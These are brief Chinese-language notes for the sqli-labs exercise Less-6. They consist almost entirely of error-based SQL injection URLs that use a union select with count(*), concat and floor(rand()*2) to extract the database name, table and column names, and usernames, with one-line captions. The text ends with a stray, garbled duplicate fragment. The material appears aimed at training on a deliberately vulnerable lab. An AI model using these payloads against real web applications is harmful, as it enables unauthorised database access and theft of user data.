获取database
http://sqli/Less-6/?id=1" union select null, count(*), concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a -- -
两次执行即可爆出database
获取表名
http://sqli/Less-6/?id=1" union select null, count(*), concat((select table_name from information_schema.tables where table_schema = "security" limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a -- -
两次执行即可爆表名
获取列名
http://sqli/Less-6/?id=1" union select null, count(*), concat((select column_name from information_schema.columns where table_schema = "security" limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a -- -
两次执行即可爆出列名
获取字段值
http://sqli/Less-6/?id=1" union select null,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a -- -
爆字段名(数据)
es group by a – -
爆字段名(数据)